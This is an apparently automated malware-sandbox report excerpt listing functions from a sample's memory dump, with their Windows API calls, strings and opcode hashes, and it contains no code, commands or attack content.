none, xrefs: 001FD8A0
cdecl, xrefs: 001FD81C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 69cdd57c2eba494a5e86a62643ee80baa0158ae2a99195757be659ebbc5eac49
Instruction ID: bf26a98fa5ef3fbb098225e1006c09fb2e4062c7170860373482c1ad9da70f61
Opcode Fuzzy Hash: 69cdd57c2eba494a5e86a62643ee80baa0158ae2a99195757be659ebbc5eac49
Instruction Fuzzy Hash: D831B0B1904619ABCF00EF58C8519FEB3B6FF25320F108669E825976D1DB71EE05CB80

Function 001D8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001D8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001D8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 001D8F57

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

Strings

ListBox, xrefs: 001D8ED3
ComboBox, xrefs: 001D8E9E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 3a994eb58fa0bce159c04f8dd95b08b7f4c12d0f4325cd4a98545b2aa10d7798
Instruction ID: 3addbafd4e7f4063800340401a1aa7f6a5b2d5429cb6aeecbd7477680709ebe8
Opcode Fuzzy Hash: 3a994eb58fa0bce159c04f8dd95b08b7f4c12d0f4325cd4a98545b2aa10d7798
Instruction Fuzzy Hash: BC2101B5A00204BEDB24ABB0DC89DFFB779DF16320F10462AF421972E1DF39490ADA10

Function 001F182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001F1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001F18A2
InternetCloseHandle.WININET(00000000), ref: 001F18E9

Part of subcall function 001F2483: GetLastError.KERNEL32(?,?,001F1817,00000000,00000000,00000001), ref: 001F2498
Part of subcall function 001F2483: SetEvent.KERNEL32(?,?,001F1817,00000000,00000000,00000001), ref: 001F24AD

Strings

, xrefs: 001F1893

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: fd9fa6600419da71a58d42c17fa47b930fdb01cebf0572c48d7779ac873a902e
Instruction ID: b97b2d90bc5bee8d9b7638183e8e62c2ef14315f810db053a2080de81f651fcc
Opcode Fuzzy Hash: fd9fa6600419da71a58d42c17fa47b930fdb01cebf0572c48d7779ac873a902e
Instruction Fuzzy Hash: C321CFB150030CBFEB219F64DD85EBFB7EDEB48784F10412AFA05A6240EB708D0597A1

Function 002063E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00206461
LoadLibraryW.KERNEL32(?), ref: 00206468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0020647D
DestroyWindow.USER32(?), ref: 00206485

Strings

SysAnimate32, xrefs: 0020643C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 0fb75168cc267ef7aeab0b76ecb2e04df8cdecd57bb50657a6f90a0c8063cc37
Instruction ID: 93af448469f7bc34d8496949464e2bea40f51ed2a2ff9ddb3fb4fbc2e3fc237c
Opcode Fuzzy Hash: 0fb75168cc267ef7aeab0b76ecb2e04df8cdecd57bb50657a6f90a0c8063cc37
Instruction Fuzzy Hash: 0E218E71120306BFEF204FA4EC88EBA77ADEF59728F104629F910920D2D7719C719B60

Function 001E6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001E6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E6DEF
GetStdHandle.KERNEL32(0000000C), ref: 001E6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001E6E3B

Strings

nul, xrefs: 001E6E36

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e9d424dd5ee8e4f0b0dfdd89be0d54976c38b192b4fc4a6754234511d45d038f
Instruction ID: 37fb32e15794175d36d61b435d51e75d23d7379f8f07cdde6e86a4cb784a6e51
Opcode Fuzzy Hash: e9d424dd5ee8e4f0b0dfdd89be0d54976c38b192b4fc4a6754234511d45d038f
Instruction Fuzzy Hash: B9218175600749AFDB209F6ADC05A9E77E8FF64760FA04A19FCE0D72D0D77099508B50

Function 001E6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001E6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E6EBB
GetStdHandle.KERNEL32(000000F6), ref: 001E6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001E6F06

Strings

nul, xrefs: 001E6F01

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 4f95e33be3d6b7d90ea7ac5e0aec9c7f4041996b5c1dbbaf39c46d4ef0748998
Instruction ID: ab46cf435b13c4d19453cb85dc2ef4e857dd555fcf9f069cab6c87aafed1bfc8
Opcode Fuzzy Hash: 4f95e33be3d6b7d90ea7ac5e0aec9c7f4041996b5c1dbbaf39c46d4ef0748998
Instruction Fuzzy Hash: 5421B3795007459FDB20DF6ADC04AAE77E8EF657A0F640A59FCA0D72D0D770A850CB50

Function 001EAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001EAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001EACA8
__swprintf.LIBCMT ref: 001EACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0020F910), ref: 001EACFF

Strings

%lu, xrefs: 001EACBB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 67ec03bed719df3c4745e73ce78a398515ef60a693ca1f7ad59e58dad90ff7cd
Instruction ID: 7014e3a29b019c84fe61fe5b4db60228fc196995b97cfc2f85776917fdac4b16
Opcode Fuzzy Hash: 67ec03bed719df3c4745e73ce78a398515ef60a693ca1f7ad59e58dad90ff7cd
Instruction Fuzzy Hash: BB218334A00209AFCB10EF65DD45DEEBBB8FF49714B144069F909DB252DB71EA41CB61

Function 001E1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001E1B19

Strings

EXISTS, xrefs: 001E1B41
KEYS, xrefs: 001E1B30
REMOVE, xrefs: 001E1B1F
APPEND, xrefs: 001E1B52

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 98ec863ca941d6a0b6a2b2927158bb4cf640edaf98e5468d344f71d9098bd66c
Instruction ID: 304d9fb83cc5199354852b2ac31b9fe2dd2db745bd95bbb30a3dd6bdfa0d8f78
Opcode Fuzzy Hash: 98ec863ca941d6a0b6a2b2927158bb4cf640edaf98e5468d344f71d9098bd66c
Instruction Fuzzy Hash: BB1184759102589FCF00EF54D8518FEB7B4FF26304F544865E8156B692EB325D06CF50

Function 001FEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001FEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 001FEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001FED6A
CloseHandle.KERNEL32(?), ref: 001FEDEB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 7e820ea384c727d7acebe511bd962d857d0c39597c3223ae3913ba77b9cc63e0
Instruction ID: a42292e22f081223ca26198c1d8aaf38948c0390732accb5e32785f2b43f9b96
Opcode Fuzzy Hash: 7e820ea384c727d7acebe511bd962d857d0c39597c3223ae3913ba77b9cc63e0
Instruction Fuzzy Hash: 01818F716003019FD760EF68C886F2AB7E5AF58710F14891DFA9A9B292DB70AD41CF91

Function 00200037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 00200E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FFDAD,?,?), ref: 00200E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002000FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00200183
RegCloseKey.ADVAPI32(?,?), ref: 002001AF
RegCloseKey.ADVAPI32(00000000), ref: 002001BC

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: ffeff233d510298522c238a2acf8a8e10d94094cd6d86480c9880f6bcaa8e621
Instruction ID: feee4415f3ed2649e9fc543c4e08e6af5c61f0011cab50d4f80ac90f7481299d
Opcode Fuzzy Hash: ffeff233d510298522c238a2acf8a8e10d94094cd6d86480c9880f6bcaa8e621
Instruction Fuzzy Hash: 71516771218305AFD714EF68C881F6AB7E9FF88314F04492DF599872A2DB31EA14CB52

Function 001FD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 001FD927
GetProcAddress.KERNEL32(00000000,?), ref: 001FD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 001FD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 001FDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 001FDA21

Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7896,?,?,00000000), ref: 00185A2C
Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7896,?,?,00000000,?,?), ref: 00185A50

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 25e33cf06e3825d52d6699c2ae74725d619b078cc4c51e8830d0bdc6d9709b14
Instruction ID: 8ac22bcd2f21e02529b06d8f2e372709442a580d2c83f4322b3a6d668287037c
Opcode Fuzzy Hash: 25e33cf06e3825d52d6699c2ae74725d619b078cc4c51e8830d0bdc6d9709b14
Instruction Fuzzy Hash: 18513675A00209DFCB04EFA8D4849BDB7F6FF19324B048065E959AB322DB71AE45CF91

Function 001EE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001EE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001EE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001EE687

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001EE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001EE6B4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 1e58c766501cbed7d39fdb6f07c99d5a350853a995fad086cedc1a65b0721442
Instruction ID: 23c5cb275e54a4129ee1935bc30d5ee5bb7043808228e2df14ad1553ad2c6dff
Opcode Fuzzy Hash: 1e58c766501cbed7d39fdb6f07c99d5a350853a995fad086cedc1a65b0721442
Instruction Fuzzy Hash: 52510B35A00609DFCB05EF65C9859AEBBF5EF19314F1480A9E809AB362CB31EE11DF50

Function 0020A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7cec1b6ce5618ed925af678959fb6349f4abb264806e8c3c3aea0f582c6fe0
Instruction ID: 2a3ab3077e747cc0d9660da4f8026a066bcf9a28e7931ff7266a024ce75b84a1
Opcode Fuzzy Hash: 0b7cec1b6ce5618ed925af678959fb6349f4abb264806e8c3c3aea0f582c6fe0
Instruction Fuzzy Hash: BE412635924315AFC720DF38DC49FA9FBA9EB09310F940165F81AA72E3C770AD61DA51

Function 00182344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00182357
ScreenToClient.USER32(002457B0,?), ref: 00182374
GetAsyncKeyState.USER32(00000001), ref: 00182399
GetAsyncKeyState.USER32(00000002), ref: 001823A7

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 436b3e2d00b9482fd2cbd4ced076df80d536d7898a5421003ad03475a62afd7c
Instruction ID: 8544497bea345e2fe2986a4982c203fc2a45e0de59fc6de84fbe58b88874e6d1
Opcode Fuzzy Hash: 436b3e2d00b9482fd2cbd4ced076df80d536d7898a5421003ad03475a62afd7c
Instruction Fuzzy Hash: 93418575604209FBCF2AAF68CC48AE9FB74FB09360F204319F82992291C7349E50DF91

Function 001D63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 001D6433
TranslateMessage.USER32(?), ref: 001D645C
DispatchMessageW.USER32(?), ref: 001D6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D6475

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 2b5c8c4948f5fd8a53ca6246e7013707789bfbe86ab4eee1c205e2d60214c8c3
Instruction ID: d9f1a2ff78df9b7f7c0f9fd834b79360adea2873dbe698c316b3b627bde207ad
Opcode Fuzzy Hash: 2b5c8c4948f5fd8a53ca6246e7013707789bfbe86ab4eee1c205e2d60214c8c3
Instruction Fuzzy Hash: E731D931940656EFDB64CFB4EC48BB6BBACAB01310F150177E465C32A2E7799889DB60

Function 001D8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001D8A30
PostMessageW.USER32(?,00000201,00000001), ref: 001D8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001D8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 001D8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001D8AF8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
Instruction ID: 1bd017853986c901a2cb79643bb4dec1d2d5bc72a4881b8d2fd6c3948bd64eed
Opcode Fuzzy Hash: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
Instruction Fuzzy Hash: 4831AE71500219EBDF14CFA8D94DA9E7BB9EB05315F10822AF929EB2D1CBB09914DB90

Function 001DB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 001DB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001DB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001DB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001DB27F
_wcsstr.LIBCMT ref: 001DB289

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 9f25f3a56b0266691016f3497808fc43364964fe3119613ae0760035d9d8356b
